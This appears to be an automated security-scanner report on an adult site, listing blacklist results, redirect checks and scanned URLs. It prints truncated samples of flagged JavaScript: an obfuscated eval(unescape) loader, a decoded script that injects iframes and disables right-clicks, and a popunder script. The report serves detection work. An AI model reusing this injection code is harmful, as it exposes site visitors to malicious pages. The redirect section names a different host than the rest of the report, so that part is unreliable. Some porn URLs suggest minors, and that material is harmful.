Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=5up.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://5up.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: artepilipino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 05:38:28 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4702
Content-Type: text/html
...4702 bytes of data.
GET / HTTP/1.1
Host: artepilipino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 05:38:28 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4702
Content-Type: text/html
...4702 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: artepilipino.com
Referer: http://www.google.com/search?q=artepilipino.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: artepilipino.com
Referer: http://www.google.com/search?q=artepilipino.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://5up.net/ | 200 OK Content-Length: 74395 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: pussymm.com <HTML> <HEAD> <base target=_blank> <TITLE>5up Free Porn Archive</TITLE> <META name="description" content="WORLDS LARGEST FREE PORN ARCHIVES"> <META name="keywords" content="porno,fuck,nude,virgins,virgin,fuck,sex,porn"> <style type=text/css> td { FONT-SIZE: 11pt; FONT-FAMILY: tahoma; font-weight: bold} A:link { COLOR: ffffff; TEXT-DECORATION: underline } A:visit ...[4861 bytes skipped]... | ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://adspaces.ero-advertising.com/adspace/138174.js | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://5up.net/out/out.php?w=1&p=100&url=http://www.virginz.net | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Sep 2014 06:30:30 GMT Location: http://www.5up.net/tp/out.php?p=0&link=BC Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.6 | clean |
http://www.5up.net/tp/out.php?p=0&link=bc | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Sep 2014 06:30:30 GMT Location: http://www.ratx.com/tube/13231509/Young_Russian_Virgin Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html Set-Cookie: tp=MXwxfDE0MTA3NjI2MzB8MTQxMDc2MjYzMHwxOw%3D%3D; expires=Tue, 16-Sep-2014 06:30:30 GMT; path=/ Set-Cookie: ca=redirected X-Powered-By: PHP/5.2.6 | malicious |
http://www.ratx.com/tube/13231509/young_russian_virgin | 200 OK Content-Length: 10156 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;eval(unescape('va\162%20qy%37%3D%27%27%3B%71%79%38%3D\123%74ri\156%67%2Ef\162o\155%43%68\141\162Cod\145%28%31%33%2C%31%30%29%3Bfo%72%28\151%3D%30%3B%69%3C%32%33%35%35%3B\151%2B%2B%29%7Bq%79%37%2B%3 ...[1087 bytes skipped]... Decoded script: ...[1239 bytes skipped]... imeout("cc()",200)};cc()};function cNS(e){if(dl||ws){if(e.which==2||e.which==3){(msg);return false}}};if(dl){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=cNS}else{document.onmouseup=cNS};document.oncontextmenu=new Function("return false");if(oe){function ro(e){if(event.button==2){alert(' ');return 0};return true};document.onmousedown=ro};s0='<table>qg<tr><td valign=top>qg<iframe src=http://rp92802348hg39nbb392093b34dk88j.ratx.com/ratx.php?vid=';s1=' scrolling="no" align="MIDDLE" width="630" height="490" frameborder="No" marginHeight="0" marginWidth="0"></iframe>qg<br> <a href=http://www.sextubedownload.com/><font face=verdana size=2><b>Get Premium Access for $2.95 To Download This Movie Instantly Plus over 1300 Movies</a>qg</td>qg<td align=center valign=top>qg <iframe src=http://www.ratx.com/movies/midad.php scro ...[1920 bytes skipped]... Antivirus reports:
| ||
http://www.ratx.com/fpc.js | 200 OK Content-Length: 1982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1559 bytes skipped]... } else if ( document.addEventListener ) { document.addEventListener( 'click', checkTarget, false ); } } function checkTarget(e) { if ( !getCookie('re4k') ) { var e = e || window.event; var browLangCode = navigator.browserLanguage; var refer = window.location.href; var url = "http://www.tubery.net"; var win = doOpen(url); setCookie('rek', 1, 24*60*60*1000); } } initPu(); Antivirus reports:
| ||
http://adspaces.ero-advertising.com/adspace/135975.js | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://5up.net/movies/videos.php?link=top&to=24sextube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=1teenporn.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=redpeppertube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=moviemo.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=porntubedownload.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=tube3.org | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=yourexgirls.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=youngschoolgirls.biz | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |